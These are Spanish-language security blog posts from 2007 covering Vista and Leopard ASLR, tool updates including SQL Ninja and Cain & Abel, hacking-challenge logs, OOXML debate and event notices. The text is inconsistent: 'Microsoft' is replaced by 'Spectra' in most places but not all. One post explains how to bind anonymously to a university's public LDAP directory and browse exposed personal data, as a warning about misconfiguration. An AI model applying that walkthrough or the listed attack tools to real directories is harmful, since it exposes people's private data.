Ortografía

Soy el primero que la caga con las prisas y demases, pero tengo que aplicarme el cuento.

Esto lo pongo con especial recuerdo para el gran "pajarrado" de los Santos, enamorado de los mensajes con kas!

Buen puentazo!!!

ASLR + APPLE

A pesar de que muchos tecnicoless siguen recomendando Windows XP sobre Windows Vista sin tan siquierea haberlo probado, perdiendo el Ctrl+AlT+Supr y la verguenza, y descubriendo que la tecla de Windows servía para algo, lo cierto es que Vista trajo montones de tecnologías al gran público que en otros sistemas operativos ni existen, están en beta o en productos muy expecíficos. Una de estas tecnologías es el ASLR que ayuda a complicar cualquier intento de ataque por desbordamiento.

La idea es muy sencilla, cada librería del sistema es cargada en una dirección de memoria distinta, dentro de un rango de 256 valores, dependiendo del resultado que se obtenga a través de una función de entropia.

Esto permite que para los programadores de exploits sea más complejo realizar las llamadas a las funciones del sistema. De esto ya escribí, en cuatro posts tiempo ha, en el blog de Vista Técnica.

Conseguir un exploit remoto de ejecución arbitraria de código en Windows Vista creo que aún lo están buscando, pues aunque se consiga desbordar algun programa, el saber a que direcciones debes llamar hace casi imposible el programar este exploit.Si a esto añades que un exploit no llama a una sola función sino a varias las probabilidades de acertar todas las direcciones de todas las librerías tienden a la probabilidad e Hamilton de ganar el mundial de F1 2007. Esta tecnología junto a DEP tienen el inconveniente de que pueden hacer que muchas aplicaciones antiguas dejen de funcionar. Un problema de compatibilidad hacia atrás en pro de mayor Seguridad.

Hay planes de futuro para implementar estas tecnologías en el mainstream de las distribuciones de Linux y distribuciones fortificadas y especilizadas en sistemas robustos las implementan hace tiempo, pero el último que se ha subido al carro ha sido MacOSX.

Library Randomization

Defend against attackers with no effort at all. One of the most common security breaches occurs when a hacker’s code calls a known memory address to have a system function execute malicious code. Leopard frustrates this plan by relocating system libraries to one of several thousand possible randomly assigned addresses

No es la única novedad que trae la última versión del sistema operativo, pero parece que al final las características de algo tan maduro como los sistemas operativos tiende a juntarse.

Vista no solo trae ASLR y DEP, sino también dos tecnologías como UiPi y MIC que ayudan a mejorar la seguridad del sistema.

Windows Vista y el Malware I y Windows Vista y el Malware II

Por favor, instala lo que más te mole, pero... no digas tonterías, que ya les es suficientemente duro el trabajar como Directores de Seguridad en Spectra [Trabajas en Spectra?]

Security Day: En Lista de Espera

El Security Day está lleno, sientolo mucho por todos aquellos que os habéis quedado sin plaza. De momento estaréis en la lista de espera, pero es que no se puede hacer mucho más. El evento está lleno. :(

La sala es muy grande, así que, si tenéis entrada os recomiendo que estéis allí prontito para coger buen sitio. En el evento de Getafe dimos entrada a todos, pero algunos ya sabéis que lo vieron desde la última fila sentados en sillas accesorias o desde la última altura del palco. Por cierto, el coche es una mala opción para ir allí, salvo que madrugueis muy mucho.

Nos vemos allí!

Nuevas Versiones de Viejos Juguetes ...y Alguno Nuevo

XSSDetect, El Nuevo.

Spectra ha liberado XSSDetect en versión beta. Esta herramienta es un pulgin para Visual Studio que ayuda a detectar fallos de XSS, qué siguen siendo la amenaza número uno, en las aplicaciones web. La herramienta la podéis descargar de esta URL y tenéis más información en el blog de ACE Team.

Cain & Abel, El Malo.

Desde la anterior versión que salió a finales de Julio ha pasado tres meses y ya hay disponible una nueva versión con nuevas opciones:

- Added support for new AES-128bit Keyfobs in RSA SecurID Token Calculator.
- Microsoft SQL Server 2005 Password Extractor via ODBC.
- Fixed a bug in Internet Explorer 7 AutoComplete password decoder.
- Default HTTP users and passwords fields updated.
- Automatic recognition of AirPcap TX capability based on channels.

Además la herramienta cuenta con un manual muy acabado respecto a las primeras versiones del mismo en la siguiente URL: Manual Cain&Abel

SQL Ninja, El Ciego.

Esta herramienta pensada para hacer ataques Blind SQL Injection basados en tiempos disfruta desde el día 08/10/2007 de una nueva versión que mejora el algoritmo de fingerprinting y optimiza el método de bruteforcear. Descargala de aquí.

Pipper, El Paiper.

La herramienta creada por Mandingo y rebautizada como “paiper” por RoMaNSoFt ha sido actualizada la semana pasada. La versión 1.24 dispone de una útil salida de resultados en formato XML y viene acompañada de nuevos conjuntos de diccionarios. Está disponible en la siguiente URL: Pipper v1.24

Y esto es todo amigos!

Aprende por el morro y si quieres... Certifícate!

Como ya es habitual en la compañía de la banderita de colores se ha vuelto a invertir pasta para lavar las cabezas de las mentes jovenes y con el único fin de que estos consigan aprender las tecnologías del mal para y se conivertan para siempre en acolitos de Spectra.

Son 10 certificaciones completas, que se van a Impartir totalmente GRATUITAS en Getafe. Cualquiera que esté desempleado puede acceder a ellas por la jeta. El nombre que se le ha dado al curso en Español puede confundiros un poco [el nombre de la izquierda en la tabla], por eso os he dejado el nombre interno [el de la derecha en la tabla].


Tenéis 2 certificaciones en Sorporte Técnico [Azul claro]:

- MCDST

Dos certificaciones en Sistemas [Color Rojo]:

- MCSA - Administrador de Sistemas
- MCSE - Ingeniero de Sistemas

Una Certificación en Productos Servidores [Color Verde]:

- SQL Server 2005 - Bases de Datos

Cuatro certificaciones para ganar pasta [Color Amarillo]. De estas hay tanta demanda, que es salir del curso y estar contratado al 99 %. Son las certificaciones de Dynamics y CRM.

Dos certificaciones en Desarrollo con Visual Studio [Color Azul]

- Desarrollador Windows.
- Desarrollador Web.

Los cursos son para grupos de 15 alumnos, y están formados por los cursos oficiales necesarios para que luego puedas hacer el examen de certificación. Todo es totalmente GRATUITO. Las duraciones varían entre 81 y 258 horas. Los cursos se van abriendo en cuanto el grupo de 15 personas está formado, pero en cuanto se cierre el cupo, ya no habrá más plazas. Si tienes en mente certificarte o aprender Windows Server, SQL Server, etc... o buscarte un curro en tecnología de Spectra ésta es una buena oportunidad. Para conseguir toda la información y registratarte tienes que rellenar un formulario y llamar por telefóno ya mismo. Toda la información la tienes en esta URL:

Microsoft y la Comunidad de Madrid han firmado un acuerdo por el que se ofrecerán cursos gratuitos de certificación oficial de Microsoft a los desempleados de la Comunidad de Madrid en el nuevo Centro de Formación en Tecnologías de la Información y Comunicaciones Madrid-Sur.

Para los demás, ya conocéis las otras posibilidadades de formarse en las filas del mal:

- Todos los Recursos Online Gratuitos.
- Los Hands On Lab para profesionales de Sistemas.
- Los Hands On Lab para profesionales de Desarrollo.
- El Live Technology Tour.
- El University Tour para Estudiantes.

Saludos malignos!

¿Y tú por qué vienes?

Cuando me planteo escribir un post para el blog, algo que hago casi a diario, a pesar de que a diario pongo algo, siempre me hago la misma pregunta, ¿por qué cojones vendrá la gente? Durante este año y medio largo que lleva este sitio abierto he ido recapitulando mensajes que me habéis ido enviando sobre cuáles son las motivaciones para venir a pasarse por aquí.

La primera de todas las motivaciones que he visto ha sido la de ¿qué coño hago yo aquí? Amigo que busca en el google por Porno, como afeitarse los testículos o por cocaína y acaba en este pozo de inmundicia.

Esto a veces crea frustración, como demuestra el mensaje que me dejó un amigo cuando buscaba información sobre los sistemas operativos y cayó perdido en este “tontopost”.

Otros bien “buscando FUD del bueno” como me puso alguno en un comentario, para estar listo contra todas las armas del mal y poder fuddear todos los argumentos pecaminosos y lascivos.

Otros vienen solo para “ver qué tontería dice el subnormal este”, lo cual me preocupa, pues me siento cómo si mi opinión, personal, mediatizada y subversiva importara a alguien, cuando este blog nació solo por puro cachondeo, para alimentar la teoría de la conspiración y para partirme la caja. Para generar opinión ya hay gente más cualificada y no me refiero a la gente “qué se cree más cualificada”.

Algunos, los más apirolaos, se pasan a ver si hay algún artículo técnico que merezca la pena, cosa que utilizo como mecanismo para poder tomar aire cuando estoy de peonza por España, así que me guardo los posts técnicos para cuando estoy subido en un avión, haciendo informes, rompiendo webs o dando una charla.

Otros se pasan solo por el puro cachondeo, hartos de escuchar las mismas cosas del lado del bien vienen aquí a unirse a las filas del mal, a coger su chapa de Spectra, encargar su camiseta y descojonarse un rato de los técnicoless al tiempo que se desahogan de la presión mediática del lado del bien en ciertos entornos.

Ciertos, vienen aquí como al doctor, a pedir “la segunda opinión” sobre algo que han leído o han dicho por ahí en otros sitios e incluso, uno con quién tuve una sonora peta, después de zanjar el asunto comilona de por medio, me confesó que su novia leía el blog porque “le parecía muy gracioso”.

Otro grupo de desaprensivos vienen por los Retos Hacking a practicar a algunos y a conversar con otros que intentan romper los retos también, haciendo que esto parezca casi el Salsa Rosa de destrozawebs.

Yo se que muchas chicas vienen aquí por “fuerza sexual” que se despide en todas y cada una de las palabras de un post, pero… ¿y tú, cuál es tu excusa?

Dilbert

Dilbert:"¿Por qué parece como si la mayoría de las decisiones en mi lugar de trabajo fueran hechas por Lemurs Borrachos?"

Basurero: "Las decisitones son hechas por gente que tiene tiempo, no por gente que tiene talento"

Dilbert: "¿Por qué la gente con talento está tan ocupada?"

Basurero: "Ellos están arreglando los problemas generados por la gente que tiene tiempo"

Dilbert, 26 de Octubre de 2007

Amor Castúo

Cuando se te ocurre una idea apirolado lo peor es que al final, si eres tú el que embarca a toda la gente, tienes que cumplirla. Así ha sucedido con el calendario Torrido. Ahora estamos en fase de retoque fotográfico, pero las fotos ya están hechas. Cada uno eligió su momento y su forma. Yo, amante de los animales (no al estilo del erotismo entre especies de Kinki Kelly), decidí declarar mi amor en una foto expresiva a mi Amor Castúo: Ubuntu.

Os voy a dejar una versión Shareware de una foto SIN RETOCAR, dónde se pueden apreciar los músculos que luzco en un rojo pasión.


No quería sacar ninguna foto de estas, pero creo que es el momento de declarar mi pasión por el pobre buen Ubuntu, que en estos momentos lo está pasando mal por culpa de alguna mala configuración por defecto que a alguien, en su afán de optimizar el consumo de energía, tal vez y solo tal vez, por no quedar mal en las pruebas de energía, ha dejado un pelín en riesgo los discos duros de algunas instalaciones en portátiles. Pero no os preocupéis, que no pasa nada. Todos tenéis copia de seguridad diaría de vuestros datos, y todos cambiais los scripts de configuración manualmente.

Además, tampoco había muchas noticias de esto, sólo han pasado 14 meses. En fin, no seais malos, y aquí os dejo esta declaración de Amor Castúo. Yo me uno a las comunidades que lo están defendiendo, que además no es solo un fallo de Ubuntu y que afecta a muchas distros de linux que tienen ese valor configurado por defecto para ahorrar pila.

PD: Y luego decían que Vista consumía recursos... uñao!!!

PD2: No olvidéis ir comprando el calendario tórrido cuando salga a la venta. Vete ahorrando!!

Ubuntu, aloviu!

El Secreto de la CocaCola

Como estamos ya cerca en fechas de que se vuelva a caldear Internet con el tema de ECMA 376, aka OOXML, decidí dedicarle el post de hoy a una de las cosas que más gracia me hacen de este tema. Un amigo mio, en la intimidad, siempre le llama El Secreto de la Cocacola y no son nada más que los formatos de archivos binarios en Spectra Office.

Las críticas:

1.- "Spectra solo ha creado esto para guardar los documentos anteriores."
2.- "Esas propiedades anteriores no están documentadas y no se pueden implementar"

Como pone en el estandar OOXML, éste nace para dar soporte y compatilidad hacia atrás a todos los documentos office de versiones anteriores. Para ello el estandar tiene propiedades relativas a formatos anteriores de office.

OpenXML was designed from the start to be capable of faithfully representing the pre-existing corpus of word-processing documents, presentations, and spreadsheets that are encoded in binary formats defined by Microsoft Corporation.

Sí, es cierto, Spectra ha creado el formato justo para eso, para dar compatibilidad hacia atrás a alrededor del 90 % de los documentos del mundo, quizá, solo quizá, porque parece de sentido común. Pero además de dar compatibilidad hacia atrás a formatos Spectra Office, OOXML permite dar compatibilidad hacia atrás a formatos de terceros, permitiendo la inclusión de esqumeas XML externos y a formatos de binarios antiguos de otros, mediante la inclusión binaria y la firma de los mismos. Pero no engaña a nadie, lo pone en la página 1 del estandar.

Además, esto que a algunos le parece tan mal, es algo que se ha hecho en ODF, dónde se definen propiedades de documentos de versiones anteriores de OpenOffice.

Pero no es a esto a lo que quiero dedicar el post de hoy, sino al famoso Secreto de la Cocacola. Al formato secretisimo de los documentos binarios que nadie conoce, que nadie puede implementar y que por tanto, hace "ilegítimo" su inclusión en OOXML.

Ese formato que nadie puede implementar... Bueno, nadie... menos OpenOffice, ellos si han sabido implementarlo, o por lo menos así lo anuncian en toda la web y dentro de la campaña "Get Legal" que apareció el siguiente texto:

OpenOffice.org 2 es una suite ofimática con todas las características necesarias, y de funcionamiento similar a MS-Office. OpenOffice.org 2 hace todo lo que necesitas: procesamiento de textos, hojas de calculo, presentaciones, bases de datos y mucho más.

Incluso pueden usarse los formatos de archivo de MS-Office (.doc, .xls, .ppt), así que no necesitas reelaborar tu trabajo.

Bueno, OpenOffice lo implementa pero será de casualidad, porque nadie tiene acceso al Secreto de la Cocacola ¿no?. Bueno, nadie más, excepto Sun con el StarOffice, dónde, incluso en su versión más barata (el de 69,95 USD) (y sin necesidad de pagar las extensiones a 9.95 USDs) tiene soporte a los documentos de Spectra Office. En la documentación de Writer dice, por ejemplo:

Microsoft Office Compatible

1. Your vendor sends you a Microsoft Word document.
2. You click once to convert it to StarOffice Writer.
3. Do your magic to the document with cool StarOffice features.
4. Click and convert it back to Word and hit "send." Those folks locked into Microsoft Office don't even have to know.

Wow!. Es tan perfecta la implementación que incluso los tipos encerrados en Spectra Office no lo notarán. Vaya, otro que tiene acceso al Secreto de la Cocacola. Esto es inaceptable!!

Espero que no haya nadie más que lo tenga... Bueno, queda uno que también lo tiene. IBM. Con Lotus Symphony tenemos lo siguiente:

Can Lotus Symphony handle my existing files?

With Lotus Symphony, you can import, edit and save a variety of file formats including Microsoft Office files.

Joder! si es que tienen todos el Secreto de la Cocacola, a lo mejor es que la publicación de los formatos de Office antiguos que hizo Spectra ha tenido que ver en esto. Porque... ¿de verdad alguien piensa que Sun, IBM y OpenOffice no tienen los formatos de archivos binarios de Spectra?

Entonces, ¿se podrá o no implementar OOXML? Desde luego el Secreto de la Cocacola no es el problema, pues todos parecen haberse hecho con él, pero... no, no creo que puedan implementarlo, porque IBM, después de decir que Sí, que "qué guay!", que "molón!" y que "nosotros ya lo vamos a poner", decidieron quitarlo de la web. Y la gente de OpenOffice, no creo, porque... tiene mucho trabajo aun To Do.

Venga, coño, seamos claros de una vez.

Saludos malignos!

El palco de Honor

Soy una pija y me molan esos pequeños detalles que sólo disfrutas tú, no, no hablo de masturbación o endogamia, sino de esos juguetes que te guardas para uso propio (no, tampoco hablo de consoladores, anillos, látigos o fustas, que tenéis la mente sucia). Hablo de esas herramientas que le pido a Rodol que me tunee, que las prepare para mi, que les añada los extras y esos pequeños detallitos que hacen que las cosas tengan más "Confort".

Durante este mes, le he dedicado muchos días al tema de LDAP. Desde el mes de Junio que empezó a tomar forma todo esto en la cabeza hasta el mes de Octubre ha pasado bastante tiempo, pero la necesidad de que todo estuviera hecho no me ha permitido publicar las cosas antes.

Como la mayoría sabéis, el Reto Hacking 4 estaba implantado sobre un árbol LDAP. Habéis podido leer los solucionarios de Pedro Laguna y de Mandingo al respecto. Pero no fueron los únicos que escribieron un solucionario. Dani Kachakil y RoMaNSoFt también escribieron solucionarios que podéis leer.

Quiero dejaros para "cerrar el círculo", el Palco de Honor que nos preparó Rodol. Normalmente siempre activamos las estadísticas para los servidores de los retos, pero luego el análisis es más largo. En este caso Rodol hizo un log a medida en las páginas interesantes del reto. Es decir, dónde se debía realizar la inyección y dónde se debía responder a la pregunta.

Los logs los puso en una ruta abierta, para que la pudieramos consultar fácilmente. Esto nos permitió ver en tiempo real lo que estaba realizando cada uno de los pájaros que estaba compitiendo.... y fue divertidisimo.

Ahora, os voy a dejar el acceso a los logs para los que queráis ver cosas chulas. En ellos se vé el uso de diccionarios, el uso de scaners, los trucos de cada uno para detectar sql injections, xpath injections y lógicamente LDAP Injections cuando la cosa se fue centrando un poco.

Para acceder a los logs solo tenéis que acceder a las siguientes rutas:

http://retohacking4.elladodelmal.com/logEntrada/log/retohacking4-20070904.txt

Dónde el númerito es: AñoMesDía

Espero que os de algo más de información, a nosotros nos ha sido muy útil!

Saludos Malignos!

El colorado del verano

***************************************************************************************
Artículo publicado en Windows TI Magazine Oct'07: El colorado del Verano
***************************************************************************************

Ya ha pasado el tiempo estival del verano y ha sido un periodo especialmente movidito en el mundo de los servidores web en Internet. Este periodo es momento de visitar las playas de nuestras costas para poder practicar el inglés, el italiano, el francés y el alemán. Relajarnos leyendo esa novela de mil páginas que teníamos aparcada y dormir. Dormir hasta tarde, dormir la siesta y dormir la fiesta de la noche anterior.

Pero desde que existen los servicios direct push para el correo electrónico, los lectores RSS y las conexiones a Internet están disponibles hasta en el chiringuito de la salmonelosis de 12 gambas a 12 euralios es casi imposible abstraerse de lo que pasa en el mundo.

¿Tú has conseguido desconectar? Entonces tendrás que informarte de todo lo que ha pasado.

Resultados Fortune 1000 Webservers Survey

Durante este periodo se han hecho públicas las estadísticas sobre los servidores de la fortune 1000 en la que IIS sigue manteniendo la mayoría absoluta con un 55%, como desearía todo buen gobierno, manteniéndola desde enero de 2003.
[Spectra Web Wars]

Resultados Netcraft

En los resultados mensuales de Netcraft del mes de Septiembre, dónde Apache había mantenido una mayoría aplastante con casi el 70 % de cuota en su momento más álgido, los resultados en los servidores web activos dejan al servidor de código abierto con un 47,78% y a IIS con un 36,63%, llevando la distancia a poco más de 11 puntos, siendo ésta la más corta DE LA HISTORIA. Dicen las “malas lenguas” que esto es debido a las desdeñosas bloggers de los servicios de Spaces, pero después de años viviendo en muchos casos los Apaches de los hosting gratuitos para los www.frutos-secos-de-mi-barrio.com no es momento de hacer estas lecturas. ¿o sí?
[¿Caida Imparable de Apache?]

Sección Sucesos

Pero no solo ha habido datos de servidores web, también hemos tenido sección de sucesos. Así la web del ministerio de la vivienda se veía atacada por un defacement que dejaba su desactualizado gestor de contenidos Mambo en evidencia.
[No House?, I hack]

También se caían durante un fin de semana los servidores de WGA para autenticar las instalaciones de Windows Vista que dejaban a unas 12.000 instalaciones con necesidad de revalidarse.

Mientras tanto, los servidores de las comunidades Ubuntu eran hackeados. Este ataque tuvo cierta gracia pues en las explicaciones, los servidores que corrían resultaron ser de la distribución Linux Debian y como causas se dieron: 1)La total desactualización de todo el software que no se había parcheado porque 2) había un problema con el driver de la tarjeta de red con los nuevos kernels. Todo un poema. Bueno, 3) tampoco tenían política de seguridad de contraseñas y se logaban en remoto con la cuenta de administración sin cifrado alguno.
[Master en Gestión de Sistemas Ubuntu]

Como diversión tuvimos los servidores de información de Gentoo Linux que ante el descubrimiento de un bug, se decidió tirarlos abajo mientras que el que tenía que parchearlo regresaba de unas conferencias. Vamos, ver para creer. Los servidores estuvieron abajo más de diez días.
[Qué gente!]

A todo esto se decidía en España a finales del mes de Julio el apoyo o no a la aprobación de OOXML como estándar ISO. Al final en España el comité de Aenor votó abstenerse, pero el circo mediático que se montó en la web fue muy al más puro estilo Groucho Marx.
[ECMA 376 - OOXML - Spectra Office]

Y Linux ganando a Windows

A principios de septiembre se generó una cadena de información y posts en blogs porque unas estadísticas realizadas sobre treinta y tres millones de ordenadores utilizados para navegar por más de cinco mil sitios web mostraban que Linux había superado a Windows…. Bueno, realmente fue a Windows 98. Las cuotas de ambos eran del 1.34 % pero ciertas comunidades Linux se felicitaban por el éxito….aunque la cuota se la quitase Windows Vista a Windows 98, no dejaba de ser un éxito para algunos verse por delante casi diez años después.
[Linux Supera a Windows][Windows 98 vuelve a superar a Linux]

Y al final del verano regresó el Sol

Y es que, para cuando parecía que el sol se iba, apareció SUN Microsystems para anunciar un acuerdo en el que, después de llevar mucho tiempo soportándolo sus servidores, se decidía a vender Windows Server 2003 en OEM. De momento solo en las versiones x64, para que no se diga, que hay muchas malas lenguas por ahí sueltas.
[Al Sol que más calienta]

¿Y tú no has estado atento a este verano? Bueno, al menos estarás más sano mentalmente que los que no hemos desconectado. Este verano, no solo los “guiris” se han puesto colorados.

Security Day: Ampliado el registro

Bueno, a día de hoy por la mañanita el número de regestrados al Spectra Security Day alcanzó los 1.200 número máximo permitido para la sala que se tenía reservada. Se ha cambiado la sala y se ha ampliado el límite. Pero no creo que dure mucho el nuevo aforo, así que si tienes pensado venir mejor que reserves la plaza ya!. Al final va a ser un buen fiestorro.

Vamos, nosotros estamos un poco acojonados, las cosas como son. Por cierto, además de la entrada del SIMO se va a regalar a todos los asistentes un Hub de conexiones USB.

Si es que Spectra sólo quiere comprarte! La info del evento en "Catch The Kinki".

Saludos malignos!

Temblad, Temblad!

Recuerdo los días de verano en el barrio bronxtolita con los colegas. Las modas iban cambiando, una época era tiempo de jugar a las chapas, pero a la semana jugábamos a las canicas, luego llovía y cambiábamos a la lima, a la peonza, al balón o a los juegos más macarras que acababan con palos, como “el bote” dónde uno llevaba el bote (botella de agua o cocacola vacía) y le daba a uno. Entonces todos podían hostiarle hasta que llevaba el bote al círculo de salvaguarda. Sí, muy divertido y tranquilo todo.

En esos vernanos, ya cuando contábamos con algún año más, descubrimos los juegos de mesa y de rol y uno de los que más molaba era el RISK. Batallas, complots, alianzas y…peleas. Cómo dicen en una pinicula “¿dormirán tranquilos los creadores de juegos como el parchís, el monopoly o el RISK que han roto tantas parejas y tantos grupos de amigos?”

RISK Classic
El RISK molaba, y tenía una carta mágica, la carta de “Refuerzos”. Saltos de alegría, estabas jodido y de repente a tirar los dados para ver cuántos ejércitos obtienes… ¡Molaba!

Y este es el caso… El Lado del Mal acaba de recibir una carta de refuerzos en este mundo de técnicoless y estoy contento. El pájaro en cuestión se llama Héctor S. Montenegro y es el NTO en Spectra, es decir, lo que se llama National Technology Officer, y además lleva años trabajando en el área de la seguridad. Y enseñandome cositas "malas".

Este tipo, ha llevado entre otras "tareillas", la firma de la apertura de código con el gobierno de España, la implantación del programa CETS para luchar contra la pornografía infantil, escribió parte del libro de La Protección de Datos Personales con Tecnología de Spectra, vamos, que se encarga de llevar todos los “detallitos” que necesita España de Spectra, como el DNI Electrónico o ahora la Ley de Acceso.

Vamos, que el lado del bien puede empezar a temblar, porque acabamos de recibir refuerzos y a los dos nos mola ……..LA CAÑA!!!

Ale, RSSeseate su blog si quieres enterarte de lo que realmente se cuece en Spectra Ibérica.

- Blog: http://www.hectormontenegro.com

Saludos …malignos!!

El "Listín de Teléfonos"

Las bases de datos basadas en directorios como LDAP cuentan hoy en día con un doble uso.

Uso 1:

El primero de ellos es más genérico y extenso. Utiliza un árbol LDAP como una base de datos más. Utilízalo como te plazca. Ten en cuenta que al ser una base de datos jerárquica tiene ventajas e inconvenientes con respecto a las bases de datos relacionales. Sus principales ventajas serán la velocidad de acceso y las búsquedas restringidas en aquellos entornos en los que la modificación y el alta de nuevos datos sea de un nivel muy bajo y dónde lo que más se potencie sea la operación de búsqueda.

Uso 2:

En otra segunda utilización nos encontramos con un uso más concreto para la gestión de redes. No deja de ser un uso como el anterior, de una base de datos más, pero en este caso pensado en un entorno concreto, la gestión, la seguridad, la autorización y la autenticación de objetos y usuarios en un sistema informático. Entornos comunes para el famoso "singelsainon".

Hasta aquí todo bien, pero... hay algo que me llama la atención en esto. ¿Qué es? Pues el uso “compartido”. Me explico. Cuando tu montas un árbol LDAP lo siguiente que hay que hacer es decidir que uso le vas a dar y configurar “el esquema”. Es decir, las clases de objetos que vas a crear y mantener en este sistema. Si no vas a gestionar un sistema de seguridad de red no se debe cargar un esquema de seguridad de red…,y al revés, si tienes un sistema de gestión de red… no lo conviertas en un listín de teléfonos.

Hoy en día es común encontrase con “Listines de Teléfonos” LDAP totalmente públicos en los que se ofertan datos más que sensibles y útiles para atacantes a sistemas.

Veamos un ejemplo con la Universidad de Michigan. En ella, como en muchas otras universidades y organismos alrededor del mundo, se ofrece un “Listín de Teléfonos” a través de LDAP. En este caso en esta URL: http://directory.umich.edu/.

Este servicio es un buscador público al que se puede acceder sin ningún problema para consultar información sobre las personas de la universidad. Si ahí buscamos a alguien del sistema, por ejemplo, a “java” (por homenajear a George Lucas) vemos que nos salen los datos de un cierto usuario y del que se muestra, por ejemplo, el tipo de bebida que más le gusta. Información útil y necesario si vas a hacer una fiesta para CollegeFuckFest.

Bien, algunos datos están restringidos por el programador de la web y se nos han mostrado solo los atributos que parecen “más lógicos” para el “Listín de Teléfonos”, como por ejemplo la bebida que más le gusta a Java.

Java Bebe cerveza
Si vemos los datos que aparecen, nos damos cuenta rápidamente que las leyes de protección de datos no son iguales en todo el mundo…, pero continuemos.

Esta aplicación web nos ha mostrado los datos que le parecen pertinentes a este sitio y no solo eso, sino que también restringe el tipo de objetos sobre los que preguntar y los contenedores dónde ejecutar las cadenas de búsqueda. Es decir, “se protege” cierta información del árbol LDAP.

No obstante, la Universidad también permite conexiones al árbol LDAP mediante otro tipo de clientes, y basta con buscar en la guía de información y encontrar como se configuran las conexiones. En esta parte de la Guía de Información nos informan de cual es nombre del servidor LDAP: ldap://ldap.itd.umich.edu

El servidor está publicado en Internet y con acceso anónimo, es decir, público, como un buen “Listín de Teléfonos” al servicio de todo el mundo.

Sin embargo, al haber utilizado un esquema “más generalista”, hay información mucho más útil publicada. Utilizando un cliente LDAP puro, como LDAP Browser, se puede realizar la conexión al árbol LDAP público y ver qué información ofrece. Para conectarse a servidores LDAP públicos basta con conocer la dirección y el puerto. El puerto por defecto es el 389.

IP y puerto LDAP
y en segundo lugar acceder sólo a los objetos e información pública, para ello se marta la opción de enlace anónimo.

Conexión pública sin credenciales
Y el resto es navegar por el árbol para ver la información que se ofrece públicamente:

Navegando por el árbol LDAP
En muchos de estos árboles LDAP públicos se oferta mucha información que puede ser potencialmente peligrosa. Las versiones LDAP v2 en adelante ofertan todo un conjunto de permisos y privilegios que pueden utilizarse para restringir a nivel LDAP qué objetos, qué atributos y que clases pueden ser accedidas por qué usuarios y con que privilegios. Es decir, la gestión de la seguridad completa.

Como recomendaciones de seguridad añadidas habría que tener en cuenta el uso de LDAPs o SASL para autenticar las conexiones que hagan binding con credenciales para que no se puedan interceptar las credenciales como se vio en este ejemplo: "Capturando credenciales LDAP". Y por supuesto proteger las aplicaciones web contra LDAP Injection & Blind LDAP Injection.

Saludos malignos!!

Zaragoza - Sevilla

Zaragoza

Mañana lunes estamos en Zaragoza con el Live Technology Tour. Aún te puedes registrar ya que tenemos una pedazo de sala en el CTA. La sesión dura todo el día, así que puedes pasarte por la mañana y tomar café, venirte al tenteempié del medio día y a las sesiones de o por la mañana o por la tarde o a ambas.

La agenda y el registro están en la siguiente URL:

Zaragoza 22 de Octubre de 2007

Luego en Zaragoza continuarán los Hands On Lab en Noviembre:

• Zaragoza: 19/11 al 23/11


• SQL Server 2005
• Windows Vista


• Zaragoza: 26/11 al 30/11


• Visual Studio 2005

Sevilla

Después de "cantar" en Zaragoza, toca Sevilla. La llegada es a las 11:00 de la noche y .... ¿tendremos fiesta, no?

Saludos malignos!

Snow Crash

Hiro sale, de regreso al Sol Negro.

Hay un tio dando vueltas por el Cuadrante Hacker que realmente llama la atención. Su avatar no es ninguna maravilla, y además le está costando controlarlo. Parece alguien que se haya enchufado en el Metaverso por primera vez y no sepa como desenvolverse. Choca con las mesas, y cuando quiere volverse da varias vueltas, como si no supiera como detenerse.

Hiro camina hacia él, porque la cara le resulta familiar. Cuando el tio se detiene el tiempo sufienciente para que Hiro pueda verlo con claridad, reconoce el avatar. Es un Clint. Suelen ir en compañía de una Brandy.

El Clint reconoce a Hiro y durante un instante la sorpresa asoma en su rostro, rápidamente sustituida por su habitual apariencia tosca y adusta, de labios apretados. Levanta las manos juntas frente a él y Hiro ve que sostiene un pergamino como el de la Brandy.

Hiro echa una mano a la Katana, pero el pergamino ya está abierto ante su rostro, mostrando el resplando azulado del bitmap que contiene. Se aparta un paso, poniendose a un lado del Clint. Levanta la katana frente a su cabeza y la descarga contra los brazos del Clint, cortándolos.

Al caer, el hechizo se abre todavía más. Hiro no se atreve a mirarlo. El Clint se ha dado la vuelta y trata de escapar del Sol Negro con torpeza, rebotando de mesa en mesa, como una bola de una máquina de millón.

Si Hiro pudiese matar al tipo, cortándole la cabeza, el avatar se quedaría en el Sol Negro, para ser retirado por los demonios sepultureros. Entonces Hiro podría hackear un poco y quizá llegar a adivinar quién es y de dónde ha venido.

Pero hay unas cuantas docenas de hackers vagando por el bar, observando toda la situación, y si se acercan a mirar el pergamino acabarán como Da5id.

Neal Stephenson

***************************************************************************************
Por si os apetece entreteneros un buen rato con una novela....Snow Crash

Saludos Malignos!
***************************************************************************************

Entra en la Familia

Me humillo ante ti ¿y me faltas al repeto?
Esta es la última frase que te gustaría oir del gran "Tío" Poli Galtieri, o del "Tío" Sylvio. Aunque puede ser peor el que inflinjas alguna de las viejas reglas delante de Chris Moltisanti y vaya puesto de caballo. Aunque quitarle una Bomar a Tony no es cosa ligera. Si no has visto la serie de Los Soprano, entonces no has visto una obra de arte sobre la Mafia Newyorkina hoy en día.

La serie muestra el sutil y complejo orden establecido de normas, reglas, límites, territorios, cadenas de venganza y repercusión de los actos. Como se mueven los hilos para una concecisón de una licencia, como se gestiona una obra social para sacar pasta y que es lo que tienes que hacer para ser uno de los nuestros o dejar de serlo.

Justo es así como veo el mundo este de la "informática política", las relaciones entre las empresas recuerdan a las concesiones y negociaciones entre las familias de la Mafia "Yo vendo Windows en OEM, pero tu desarrollas para servidores de 64 bits drivers para mi hardware", "ok, pero dile a tal que incremente el coste de los servidores con Linux". "Ey, vamos a concederte este proyecto a gran escala, pero necesitamos que este político suba en tantos puntos su imagen", "...".

Supongo que los continuos movimientos estratégicos de las empresas son para analizarlos con cuidado. El acuerdo Novell-Spectra, el acuerdo IBM-OpenOffice que acaba con el lanzamiento de Lotus Symphony, el acuerdo Sun-OpenOffice para distribuir OpenOffice con la última actualización de Java, la demanda a RedHat por patentes, las alianzas en la lucha ODF-OOXML, perdón, quiero decir, la lucha OpenOffice-StarOffice-Lotus Symphony, Spectra Office....(empieza la batalla definitiva) Me encanta jugar con las conspiraciones.

La semana pasada se produjo otro movimiento de las familias, en este caso la incorporación y pública aceptación de 2 licencias del proyecto Shared Source de Spectra por parte del Open Source Initiative. Las licencias cumplían los 10 criterios y han sido aprobadas como parte de "la familia".

En la noticia publicada por "la familia OSI" ha habido que explicar algo que ya era evidente, que sí ha sido aprovada ha sido porque ha cumplido los requisitos.

